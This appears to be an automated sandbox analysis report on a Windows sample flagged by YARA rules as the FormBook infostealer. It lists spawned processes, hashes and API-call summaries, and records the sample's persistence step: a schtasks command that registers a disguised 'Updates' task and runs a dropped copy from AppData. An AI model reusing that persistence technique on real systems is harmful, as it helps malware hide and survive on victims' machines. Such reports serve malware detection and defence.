File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:04:54
Start date:	19/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:04:55
Start date:	19/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp"
Imagebase:	0x4b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:04:55
Start date:	19/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:04:55
Start date:	19/05/2024
Path:	C:\Users\user\Desktop\FGGx944Qu7.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\FGGx944Qu7.exe"
Imagebase:	0x370000
File size:	758'280 bytes
MD5 hash:	21D18E20B8B0E17E0B554B5940A7AAED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:04:55
Start date:	19/05/2024
Path:	C:\Users\user\Desktop\FGGx944Qu7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FGGx944Qu7.exe"
Imagebase:	0xb30000
File size:	758'280 bytes
MD5 hash:	21D18E20B8B0E17E0B554B5940A7AAED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:04:57
Start date:	19/05/2024
Path:	C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe
Imagebase:	0xc30000
File size:	758'280 bytes
MD5 hash:	21D18E20B8B0E17E0B554B5940A7AAED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs Detection: 67%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:04:58
Start date:	19/05/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:05:03
Start date:	19/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp"
Imagebase:	0x4b0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:05:03
Start date:	19/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:05:04
Start date:	19/05/2024
Path:	C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Imagebase:	0x570000
File size:	758'280 bytes
MD5 hash:	21D18E20B8B0E17E0B554B5940A7AAED
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2030469230.0000000000417000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:05:17
Start date:	19/05/2024
Path:	C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe"
Imagebase:	0xfa0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	02:05:18
Start date:	19/05/2024
Path:	C:\Windows\SysWOW64\SearchProtocolHost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\SearchProtocolHost.exe"
Imagebase:	0x230000
File size:	340'992 bytes
MD5 hash:	727FE964E574EEAF8917308FFF0880DE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	02:05:33
Start date:	19/05/2024
Path:	C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe"
Imagebase:	0xfa0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	02:06:11
Start date:	19/05/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	133
Total number of Limit Nodes:	6

Executed Functions

Function 054ED1B8 Relevance: 7.0, Strings: 5, Instructions: 722COMMON

Download Yara Rule

Strings

(o^q, xrefs: 054EDA4B
Hbq, xrefs: 054EDAB8
,bq, xrefs: 054ED7CF
(o^q, xrefs: 054EDA41
,bq, xrefs: 054ED7DF

Memory Dump Source

Source File: 00000000.00000002.1692837045.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54e0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-3486158592
Opcode ID: a5f2d6f390f09f841dbdff1bf4ca8d3916b03dfafeab71248252c2a03f58f9f9
Instruction ID: 4c2621e14f1caee19767ae50730b8b9e5af13ad5be0418a893d41cea8ee521cc
Opcode Fuzzy Hash: a5f2d6f390f09f841dbdff1bf4ca8d3916b03dfafeab71248252c2a03f58f9f9
Instruction Fuzzy Hash: C5526174F001159FCB08DF69C984AAE7BB2BF89351B15816EE816DB3A0DB31ED41CB90

Function 054E68C0 Relevance: .9, Instructions: 860COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692837045.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54e0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bb963c11de77bac970dc2fda8d361e2f4c3c7f98337e6c55ddbc8893c25b4b1
Instruction ID: bc87836c05bed4f3382a8d4232d3f6982b78dd847f9d8dd03e73fd12d58566fa
Opcode Fuzzy Hash: 8bb963c11de77bac970dc2fda8d361e2f4c3c7f98337e6c55ddbc8893c25b4b1
Instruction Fuzzy Hash: C692C334A10619CFCB55DF69C888AD9B7B2FF89301F5185E9E409AB361DB31AE85CF40

Function 054E68B0 Relevance: .8, Instructions: 801COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692837045.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54e0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ae8700778a9793b61dacdae3a8f374af37bcbf118a4dfe1df1aa7c971c3dd00
Instruction ID: 47cb6e98513b01ee6dd3d34f5a00b433755bbb1406452b5cae993116abc8f7ca
Opcode Fuzzy Hash: 3ae8700778a9793b61dacdae3a8f374af37bcbf118a4dfe1df1aa7c971c3dd00
Instruction Fuzzy Hash: E482C234A10619CFCB55DF68C888AD9B7B2FF89301F5185E9E409AB361DB31AE85CF40

Function 0FB01F6A Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702973209.000000000FB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0FB00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb00000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d5e574cda739ef99151ce34daa0dc3c9bf6136032b0e7c4d4c4a50d7e2c6a07
Instruction ID: 2ec682979360b02315be7bcb1dd00da6335d75a4c6d9e061c6a6dd494cb18e53
Opcode Fuzzy Hash: 0d5e574cda739ef99151ce34daa0dc3c9bf6136032b0e7c4d4c4a50d7e2c6a07
Instruction Fuzzy Hash: 61A00240EDF409E090253D74640C0F4C8BD535F100D403780C01A330C30400C4141D0C

Function 015EB1F0 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 015EB446

Memory Dump Source

Source File: 00000000.00000002.1683850240.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_FGGx944Qu7.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4e9241c1cdf7fa64958e9d27120d653e647063f7f6e766760a44e27e4b258633
Instruction ID: beb9f788f2ae37aca8b351fc857c2875178d2716bffd67a525cfd61dde3d7e18
Opcode Fuzzy Hash: 4e9241c1cdf7fa64958e9d27120d653e647063f7f6e766760a44e27e4b258633
Instruction Fuzzy Hash: 95714770A00B058FDB29DF69D14975ABBF2FF88300F108A2DD48ADBA50DB74E945CB91

Function 054E1284 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 054E4381

Memory Dump Source

Source File: 00000000.00000002.1692837045.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54e0000_FGGx944Qu7.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 0404d88c890f20a467c6ff88a99184c5ca49e8785541e283dce4baf75ef77717
Instruction ID: 1809c947b75501fc15b4428ed4a745a6d7774bc828583f1380b2702d89775f29
Opcode Fuzzy Hash: 0404d88c890f20a467c6ff88a99184c5ca49e8785541e283dce4baf75ef77717
Instruction Fuzzy Hash: DF41E7B5A00305CFCB14CF99C448BEABBF5FB88315F24C59AD519AB361D774A841CBA1

Function 015E590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015E59C9

Memory Dump Source

Source File: 00000000.00000002.1683850240.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_FGGx944Qu7.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1790b86023ce9a8b30d09c779ffd783f2c3acc1340d7d91661d010e466f62414
Instruction ID: aba5f8e255cc752e708ba950152c52c4e2461ae9549317f167125214eabe97d1
Opcode Fuzzy Hash: 1790b86023ce9a8b30d09c779ffd783f2c3acc1340d7d91661d010e466f62414
Instruction Fuzzy Hash: 5541D1B4C00719CBDB24CFA9C9847DDBBF6BF48304F24805AD408AB255EB759945CF90

Function 015E4514 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015E59C9

Memory Dump Source

Source File: 00000000.00000002.1683850240.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_FGGx944Qu7.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 4825a445bfbf5cb794d63d76b256ea3514b4842d2ea3d83bfc39c9d85c1b09b9
Instruction ID: a4ed6da57d72fbc06d8bfc3da514b074994013f5d64ed571c889236ab3a46a1d
Opcode Fuzzy Hash: 4825a445bfbf5cb794d63d76b256ea3514b4842d2ea3d83bfc39c9d85c1b09b9
Instruction Fuzzy Hash: 7741D2B4C10719CBDB24CFA9C8847DDBBF5BF49304F24806AD408AB255EB756945CF91

Function 015ED258 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015ED68E,?,?,?,?,?), ref: 015ED74F

Memory Dump Source

Source File: 00000000.00000002.1683850240.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_FGGx944Qu7.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ef4c16478c4b5af28dc06f4f464016f4f0bad9a34074d767dc159287d02f5b43
Instruction ID: 5da7b1d6d6c549a524eb1ca3830c574df9c5196d706c99f481225038552a5398
Opcode Fuzzy Hash: ef4c16478c4b5af28dc06f4f464016f4f0bad9a34074d767dc159287d02f5b43
Instruction Fuzzy Hash: 2B21D2B5D002589FDB10CF9AD584ADEBBF4FB48310F14841AE958A7350D374A950CFA5

Function 015ED6C0 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,015ED68E,?,?,?,?,?), ref: 015ED74F

Memory Dump Source

Source File: 00000000.00000002.1683850240.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_FGGx944Qu7.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 711f666bdcabb74e4f4796d54e4032c4beb3068dbd65864bd7322596eabdf2bd
Instruction ID: 475424a574de3b15195d45e320a1af8a5219cf2fc3e457708884b88ca4c4f86b
Opcode Fuzzy Hash: 711f666bdcabb74e4f4796d54e4032c4beb3068dbd65864bd7322596eabdf2bd
Instruction Fuzzy Hash: 4021E2B5D00258DFDB10CFA9D984ADEBBF8FB08320F14841AE958A7350D378A950CFA1

Function 015EAF08 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,015EB4C1,00000800,00000000,00000000), ref: 015EB6D2

Memory Dump Source

Source File: 00000000.00000002.1683850240.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_FGGx944Qu7.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8f0857b9a3512322e842d85fbbf89bb924f179aca9a412854b9652a0cbe271a0
Instruction ID: 5cfe93c59706dc344d8b0c06018971bcab848c4f7d4489121a8500e4eb3b7e79
Opcode Fuzzy Hash: 8f0857b9a3512322e842d85fbbf89bb924f179aca9a412854b9652a0cbe271a0
Instruction Fuzzy Hash: 6911E2B6D003499FDB24DF9AC448ADEFBF4FB48311F14842AE519AB210C375A945CFA5

Function 015EB660 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,015EB4C1,00000800,00000000,00000000), ref: 015EB6D2

Memory Dump Source

Source File: 00000000.00000002.1683850240.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_FGGx944Qu7.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1020c37986a7cb6f3b7e7da296f52bab299b940c24e901641df865e8ea83617a
Instruction ID: 9de866a4428fa8f514e010d0e774f9166f8b735ca4227d59e79e4af49b2b69a3
Opcode Fuzzy Hash: 1020c37986a7cb6f3b7e7da296f52bab299b940c24e901641df865e8ea83617a
Instruction Fuzzy Hash: B21123B6C002498FDB14DF9AC848ADEFBF4FB48310F14842AD959AB310C375A545CFA5

Function 015EB3E0 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 015EB446

Memory Dump Source

Source File: 00000000.00000002.1683850240.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15e0000_FGGx944Qu7.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 09c8a8714c11668d6bae5ca614b4fd5658651fca302ea70a6b39e271a4148696
Instruction ID: d54f4b86f5c23f67c619cc9b188614bed1a684ea4f112a51352aa291fa431035
Opcode Fuzzy Hash: 09c8a8714c11668d6bae5ca614b4fd5658651fca302ea70a6b39e271a4148696
Instruction Fuzzy Hash: 80110FB5C002498FDB14CF9AC448ADEFBF5AF88220F10842AD558AB210D375A545CFA1

Function 0FB00F9C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0FB02E4D

Memory Dump Source

Source File: 00000000.00000002.1702973209.000000000FB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0FB00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb00000_FGGx944Qu7.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d9c28eeccc4c57a597b45be12fea893979dc5937ba1270e24cb06108aa0c66d7
Instruction ID: d77a59ea9eef52d5d4e845e584412ce84cd696c8e4fc8c5e27990afd9c26ab78
Opcode Fuzzy Hash: d9c28eeccc4c57a597b45be12fea893979dc5937ba1270e24cb06108aa0c66d7
Instruction Fuzzy Hash: 2A1103B5800349DFCB10DF9AD589BDEBFF8EB48320F10845AE558A7251C375A944CFA5

Function 0FB02DE8 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0FB02E4D

Memory Dump Source

Source File: 00000000.00000002.1702973209.000000000FB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0FB00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fb00000_FGGx944Qu7.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 186b0ff7ac4bed6f6caf20cb60f777e7afb054c1e319177f51055fdafde40408
Instruction ID: b337c32cad1d027fb1e3788077ae1e167d0d8736168ebeaf772766d7545a47d4
Opcode Fuzzy Hash: 186b0ff7ac4bed6f6caf20cb60f777e7afb054c1e319177f51055fdafde40408
Instruction Fuzzy Hash: 471133B5800248CFCB10DF99D888BDEBFF4FB48310F20845AE518A7240C375A944CFA0

Function 0153D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683173899.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_153d000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ef5f517d1ab8e1fca6c004766a85e5d977e45cecc3355e47021f6607363160f
Instruction ID: e5523ff39d56db7bb921bca0258ce153994fa5eb70a94de0e77a2d91771ea888
Opcode Fuzzy Hash: 0ef5f517d1ab8e1fca6c004766a85e5d977e45cecc3355e47021f6607363160f
Instruction Fuzzy Hash: 47212171100200DFDB01DF58D9C0B6ABFB5FBC8324F60C569E9094F256C37AE456CAA1

Function 0154D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683430024.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_154d000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce0b509f39addccd272d6c206c95ebcb4bff82ef4e97d4e96a9f543cb2d23bfd
Instruction ID: 819987d0dcdd664bf574aca0e9d0eb16479ab9b53ee855b2e890dd77a992bd97
Opcode Fuzzy Hash: ce0b509f39addccd272d6c206c95ebcb4bff82ef4e97d4e96a9f543cb2d23bfd
Instruction Fuzzy Hash: 48212971608200DFDB05DF98D5C4B2ABBB5FB94328F20CA6DE9094F356C33AD446CA61

Function 0154D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683430024.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_154d000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0f2850e61a50ea372a3ac79294fdf88b8fb16212374e44257e4924d7a3ea871
Instruction ID: 59779d206ab0971944b5c1cb7bd2520f71584f18c70210f72784e0c0c5705694
Opcode Fuzzy Hash: d0f2850e61a50ea372a3ac79294fdf88b8fb16212374e44257e4924d7a3ea871
Instruction Fuzzy Hash: A1210071604200DFCB15DF98D984B2ABBB5FB94318F20C96DD80E4F256D33AD446CA61

Function 0154D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683430024.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_154d000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41e84cba84804d9039f37e384489e195bc9fc5d6162cef47cdb92d73bc79016e
Instruction ID: 3966d27414dbdae97ce26815676e8fce2a3aa6fd06d7803ba2653a8bd4bc0cbe
Opcode Fuzzy Hash: 41e84cba84804d9039f37e384489e195bc9fc5d6162cef47cdb92d73bc79016e
Instruction Fuzzy Hash: 602192755093808FDB13CF64D994715BF71FB46218F28C5DAD8498F2A7C33A980ACB62

Function 0153D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683173899.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_153d000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 29e5bbbd87c132eef38598613259f7f9fd7aea8d27e8ef6943360d5d029f32b0
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 2711DC72404280CFDB02CF54D9C4B5ABF72FB94324F24C2A9D9090F256C33AE45ACBA2

Function 0154D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1683430024.000000000154D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0154D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_154d000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 1527725194f10179417fb46697a4f9e9a3d8838f26f5ab6c6f1a2dc85f0c0646
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 7811BB75508280DFDB02CF54C5C4B19BFB1FB84228F24C6AAD8494F296C33AD40ACB61

Non-executed Functions

Function 054E0040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1692837045.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_54e0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49baeabd0120d91c0868bb86b7ff64b8648b52c812373d639657bea5416951e9
Instruction ID: b51ea008b1540618c7320b9e9c13b7e32cbe48c28b36bf5814ce228eb20a4634
